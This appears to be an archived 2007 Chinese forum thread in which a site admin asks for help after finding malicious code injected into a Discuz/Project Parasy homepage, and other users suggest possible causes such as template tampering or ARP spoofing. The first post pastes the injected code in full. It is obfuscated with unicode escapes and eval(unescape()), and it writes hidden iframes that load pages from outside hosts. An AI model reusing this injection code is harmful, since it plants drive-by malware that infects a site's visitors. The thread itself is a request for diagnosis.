::NoName Magazine 无名杂志 » Project Parasy » 首頁被放病毒代碼


2007-12-24 01:16 edo
首頁被放病毒代碼

=.=!用pp首頁被放病毒代碼,不知把在那裡!檢查中,,,,是安全性問題嗎?
[code]<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0062\u0069\u0067\u0073\u0074\u006f\u0072\u0065\u0075\u0073\u002e\u0069\u006e\u0066\u006f\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script><script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0062\u0069\u0067\u0073\u0074\u006f\u0072\u0065\u0075\u0073\u002e\u0069\u006e\u0066\u006f\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');

</script><!-- o --><!-- c --><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%63%61%33%64%38%61%65%64%34%38%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%78%2d%76%69%63%74%6f%72%79%2e%72%75%2f%66%6f%72%75%6d%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%31%32%37%32%29%2b%27%63%37%66%64%5c%27%20%77%69%64%74%68%3d%35%33%34%20%68%65%69%67%68%74%3d%35%30%38%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script><!-- ~ --><script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0062\u0069\u0067\u0073\u0074\u006f\u0072\u0065\u0075\u0073\u002e\u0069\u006e\u0066\u006f\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script><!-- ~ --><!-- ~ --><script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0062\u0069\u0067\u0073\u0074\u006f\u0072\u0065\u0075\u0073\u002e\u0069\u006e\u0066\u006f\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script><!-- ~ -->[/code]

2007-12-25 22:03 edo
sai,,,,,,測試後確實好像有問題
測試過5個方案,用同一數據的資料
1.Discuz 6.0
2.Discuz 5.5 (7月24前版舊版本)
3.Discuz 5.5 (7月24後新版本)
4.pp + 整合Discuz 5.5 (7月24前版舊版本)
5.pp + 整合Discuz 5.5 (7月24後新版本)
============
先確認的問題,
1.在我壇某些會員交提的資料包含不良代碼(暫時查不到)
在以上測試中,1和3佳沒問題,好像被過濾了=.=!。
5方案經修改後,上面4-5段不良代碼,餘下一後未解決到。

2007-12-25 22:15 Sai
這段代碼被放到什麽地方?以什麽方式顯示?

2007-12-25 23:26 edo
放在那不知道=.=!
以<iframe>顯示,,,,,
1.如果有裝防毒軟件,防毒軟件會彈出來說有毒,之後過濾了!
2.左下角會顯示錯誤,是那後後的錯誤!

以原始碼檔看是在</html>後面,即最後=.=!找不到位置
以前那些還可以找到位置,這個找不到。只可以靠更新檔過濾部份。

整個數據都找了!

會員跟主題資料表未找!太大=.=!
分割完在找.....

[[i] 本帖最后由 edo 于 2007-12-25 23:27 编辑 [/i]]

2007-12-25 23:46 Sai
有别的会员提出否?有可能是机器中毒了...因为除了修改模板是没有有效的挂马方式的

2007-12-27 08:33 liangxin
还可能是ARP攻击,安装一个ARP防火墙

页: [1]
查看完整版本: 首頁被放病毒代碼


Powered by Discuz! Archiver 5.5.0  © 2001-2006 Comsenz Inc.